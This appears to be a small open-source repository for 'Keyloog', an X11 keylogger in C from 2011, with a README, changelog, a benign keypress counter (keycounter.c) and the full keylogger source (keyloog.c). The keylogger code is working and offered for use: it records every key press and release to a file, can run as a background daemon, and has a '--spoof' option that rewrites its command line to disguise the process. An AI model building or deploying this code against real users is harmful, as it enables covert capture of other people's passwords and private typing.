README.md
# Keyloog

![](http://stillmaintained.com/programble/keyloog.png)

A simple keylogger for X11.

## Usage

    Usage: keyloog [OPTION]... [FILE]
    
      -a, --append          do not truncate output file
      -s, --simple          log only key down events
      -t, --time            log timestamps
    
      -d, --daemonize       run in the background
      -p, --pid-file=FILE   write PID to FILE
    
          --spoof=NAME      change command line to NAME
    
      -h, --help            display this help and exit
          --version         output version information and exit

If `FILE` is not present, write keypresses to stdout.

## License

Copyright (c) 2011, Curtis McEnroe <programble@gmail.com>

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.


ChangeLog.md
# Change Log

## 0.3.1 (11 July 2011)

 * Bugfix: Daemonize after opening output file and X display, allowing
   errors to be printed when opening fails

## 0.3.0 (10 July 2011)

 * Added `--time` option to log timestamps
 * Made `-s` equivalent to `--simple`

## 0.2.0 (8 July 2011)

 * Added `--simple` option to log only key down events
 * Added `--spoof` option to spoof command line


keycounter.c
#define _BSD_SOURCE // For usleep() and getdtablesize()
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>

#include <errno.h>
#include <fcntl.h>
#include <getopt.h>
#include <math.h>
#include <signal.h>
#include <time.h>
#include <unistd.h>
#include <X11/Xlib.h>

#define TERM_CLEAR "\x1b[2J"
#define TERM_HOME "\x1b[H"

#define PLURAL(x) (x != 1) ? "s" : ""

void output_stats();

void daemonize(const char *option_pidfile)
{
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        exit(1);
    } else if (pid > 0) {
        // Write child PID to file
        if (option_pidfile) {
            FILE *pidfile = fopen(option_pidfile, "w");
            if (!pidfile) {
                perror(option_pidfile);
                exit(1);
            }
            fprintf(pidfile, "%d\n", pid);
            fclose(pidfile);
        }
        exit(0);
    }
    
    // Detach from controlling terminal
    setsid();
    
    // Close all file descriptors
    for (int i = getdtablesize(); i >= 0; i--)
        close(i);
    
    // Open stdin, stdout, stderr to /dev/null
    int fd = open("/dev/null", O_RDWR);
    dup(fd);
    dup(fd);
}

// Signal handlers
bool end = false;

void signal_quit(int s)
{
    end = true;
}

void signal_hup(int s)
{
    output_stats();
}

int count = 0;
time_t start_time;
char *option_file = NULL;

void output_stats()
{
    FILE *file = stdout;
    if (option_file) {
        file = fopen(option_file, "w");
        if (!file) {
            perror(option_file);
            exit(1);
        }
    }
    
    long int elapsed_seconds = lrint(difftime(time(NULL), start_time));
    long int format_seconds = elapsed_seconds;
    long int format_minutes = format_seconds / 60;
    format_seconds %= 60;
    long int format_hours = format_minutes / 60;
    format_minutes %= 60;
    long int format_days = format_hours / 24;
    format_hours %= 24;
    
    fprintf(file, "You pressed %d key%s in ", count, PLURAL(count));
    if (format_days > 0)
        fprintf(file, "%ld day%s, ", format_days, PLURAL(format_days));
    if (format_hours > 0)
        fprintf(file, "%ld hour%s, ", format_hours, PLURAL(format_hours));
    if (format_minutes > 0)
        fprintf(file, "%ld minute%s, ", format_minutes, PLURAL(format_minutes));
    fprintf(file, "%ld second%s\n", format_seconds, PLURAL(format_seconds));
    
    double keys_per_second = ((double) count) / elapsed_seconds;
    double keys_per_minute = keys_per_second * 60;
    double keys_per_hour = keys_per_minute * 60;
    double keys_per_day = keys_per_hour * 24;
    
    fprintf(file, "You pressed %.2f key%s per second\n", keys_per_second, PLURAL(keys_per_second));
    fprintf(file, "You pressed %.2f key%s per minute\n", keys_per_minute, PLURAL(keys_per_minute));
    fprintf(file, "You pressed %.2f key%s per hour\n", keys_per_hour, PLURAL(keys_per_hour));
    fprintf(file, "You pressed %.2f key%s per day\n", keys_per_day, PLURAL(keys_per_day));
    
    if (file != stdout)
        fclose(file);
}

void print_usage(const char *exec_name)
{
    printf("Usage: %s [OPTION]... [FILE]\n\n", exec_name);
    printf("  -f, --follow          output keypress statistics as they update\n");
    printf("  -d, --daemonize       run in the background\n");
    printf("  -p, --pid-file=FILE   write PID to FILE\n");
    printf("  -h, --help            display this help and exit\n");
}

int main(int argc, char *argv[])
{
    // Parse command-line options
    static struct option long_options[] = {
        {"follow", no_argument, NULL, 'f'},
        {"daemonize", no_argument, NULL, 'd'},
        {"pid-file", required_argument, NULL, 'p'},
        {"help", no_argument, NULL, 'h'},
        {0, 0, 0, 0}
    };
    
    bool option_follow = false, option_daemonize = false;
    char *option_pidfile = NULL;
    
    char o;
    while ((o = getopt_long(argc, argv, "fdp:h", long_options, NULL)) != -1) {
        switch (o) {
        case 'f':
            option_follow = true;
            break;
        case 'd':
            option_daemonize = true;
            break;
        case 'p':
            option_pidfile = optarg;
            break;
        case 'h':
            print_usage(argv[0]);
            return 0;
        case '?': // Unrecognized argument
            return 1;
        }
    }
    
    if (optind < argc)
        option_file = argv[optind];
    
    // Set up signals
    signal(SIGTERM, signal_quit);
    signal(SIGQUIT, signal_quit);
    signal(SIGINT, signal_quit);
    
    signal(SIGHUP, signal_hup);
    signal(SIGUSR1, signal_hup);
    
    // Daemonize
    if (option_daemonize)
        daemonize(option_pidfile);
    
    // Open X display
    Display *display = XOpenDisplay(NULL);
    if (!display) {
        fprintf(stderr, "Error: Could not open X display\n");
        return 1;
    }
    
    if (option_follow)
        printf(TERM_CLEAR TERM_HOME);
    
    start_time = time(NULL);
    char keys_current[32], keys_last[32];
    
    XQueryKeymap(display, keys_last);
    while (!end) {
        fflush(stdout);
        usleep(5000);
        
        XQueryKeymap(display, keys_current);
        for (int i = 0; i < 32; i++) {
            if (keys_current[i] > keys_last[i]) {
                count++;
                if (option_follow) {
                    printf(TERM_CLEAR TERM_HOME);
                    output_stats();
                }
            }
            keys_last[i] = keys_current[i];
        }
    }
    
    XCloseDisplay(display);
    
    if (!option_follow)
        output_stats();
    
    return 0;
}


keyloog.c
#define _BSD_SOURCE // For usleep() and getdtablesize()
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>

#include <errno.h>
#include <fcntl.h>
#include <getopt.h>
#include <math.h>
#include <signal.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <X11/Xlib.h>

#ifndef PROGRAM_VERSION
#   define PROGRAM_VERSION "(unknown)"
#endif

void daemonize(const char *option_pidfile)
{
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        exit(EXIT_FAILURE);
    } else if (pid > 0) {
        // Write child PID to file
        if (option_pidfile) {
            FILE *pidfile = fopen(option_pidfile, "w");
            if (!pidfile) {
                perror(option_pidfile);
                exit(EXIT_FAILURE);
            }
            fprintf(pidfile, "%d\n", pid);
            fclose(pidfile);
        }
        exit(EXIT_SUCCESS);
    }
    
    // Detach from controlling terminal
    setsid();
    
    for (int i = 0; i < 3; i++) {
        close(i);
        open("/dev/null", O_RDWR);
    }
}

// Signal handlers
bool end = false;
int end_signal;

void signal_quit(int s)
{
    end_signal = s;
    end = true;
}

void print_version()
{
    printf("Keyloog " PROGRAM_VERSION "\n");
}

void print_usage()
{
    printf("Usage: keyloog [OPTION...] [FILE]\n\n");
    
    printf("  -a, --append          do not truncate output file\n");
    printf("  -s, --simple          log only key down events\n");
    printf("  -t, --time            log timestamps\n\n");
    
    printf("  -d, --daemonize       run in the background\n");
    printf("  -p, --pid-file=FILE   write PID to FILE\n\n");

    printf("      --spoof=NAME      change command line to NAME\n\n");
    
    printf("  -h, --help            display this help and exit\n");
    printf("      --version         output version information and exit\n");
}

int bit_offset(unsigned char x)
{
    return (int) log2((double) x);
}

void spoof_argv(int argc, char *argv[], char *spoof)
{
    strncpy(argv[0], spoof, strlen(argv[0]));
    for (int i = 1; i < argc; i++) {
        memset(argv[i], 0, strlen(argv[i]));
    }
}

int main(int argc, char *argv[])
{
    // Parse command-line options
    static struct option long_options[] = {
        {"append",      no_argument,        NULL, 'a'},
        {"simple",      no_argument,        NULL, 's'},
        {"time",        no_argument,        NULL, 't'},
        {"daemonize",   no_argument,        NULL, 'd'},
        {"pid-file",    required_argument,  NULL, 'p'},
        {"spoof",       required_argument,  NULL, 'S'},
        {"help",        no_argument,        NULL, 'h'},
        {"version",     no_argument,        NULL, 'V'},
        {0, 0, 0, 0}
    };
    static char short_options[] = "astdp:h";
    
    bool option_daemonize = false, option_append = false, option_simple = false, option_time = false;
    char *option_pidfile = NULL, *option_file = NULL, *option_spoof = NULL;
    
    char o;
    while ((o = getopt_long(argc, argv, short_options, long_options, NULL)) != -1) {
        switch (o) {
        case 'a': option_append = true;     break;
        case 's': option_simple = true;     break;
        case 't': option_time = true;       break;
        case 'd': option_daemonize = true;  break;
        case 'p': option_pidfile = optarg;  break;
        case 'S': option_spoof = optarg;    break;
        case 'h': print_usage();            exit(EXIT_SUCCESS);
        case 'V': print_version();          exit(EXIT_SUCCESS);
        case '?':                           exit(EXIT_FAILURE);
        }
    }
    
    if (optind < argc)
        option_file = argv[optind];

    // Set up signals
    signal(SIGTERM, signal_quit);
    signal(SIGQUIT, signal_quit);
    signal(SIGINT, signal_quit);

    // Spoof argv
    if (option_spoof)
        spoof_argv(argc, argv, option_spoof);
    
    // Open X display
    Display *display = XOpenDisplay(NULL);
    if (!display) {
        fprintf(stderr, "Error: Could not open X display\n");
        exit(EXIT_FAILURE);
    }
    
    // Open output file
    FILE *file = stdout;
    if (option_file) {
        file = fopen(option_file, option_append ? "a" : "w");
        if (!file) {
            perror(option_file);
            exit(EXIT_FAILURE);
        }
    }

    // Daemonize
    if (option_daemonize)
        daemonize(option_pidfile);
    
    char keys_current[32], keys_last[32];
    
    XQueryKeymap(display, keys_last);
    while (!end) {
        fflush(file);
        usleep(5000);
        
        XQueryKeymap(display, keys_current);
        for (int i = 0; i < 32; i++) {
            if (keys_current[i] != keys_last[i]) {
                int keycode = i * 8 + bit_offset(keys_current[i] ^ keys_last[i]);
                int keysym = XKeycodeToKeysym(display, keycode, 0);
                char *key = XKeysymToString(keysym);

                time_t now = time(NULL);
                char *timestamp = ctime(&now);
                timestamp[strlen(timestamp)-1] = 0; // Strip \n

                if (option_simple && keys_current[i] > keys_last[i]) {
                    if (option_time)
                        fprintf(file, "[%s] %s\n", timestamp, key);
                    else
                        fprintf(file, "%s ", key);
                } else if (!option_simple) {
                    if (option_time)
                        fprintf(file, "[%s] %c%s\n", timestamp, (keys_current[i] < keys_last[i]) ? '-' : '+', key);
                    else
                        fprintf(file, "%c%s ", (keys_current[i] < keys_last[i]) ? '-' : '+', key);
                }
            }
            keys_last[i] = keys_current[i];
        }
    }
    
    XCloseDisplay(display);
    fclose(file);
    
    return EXIT_SUCCESS;
}
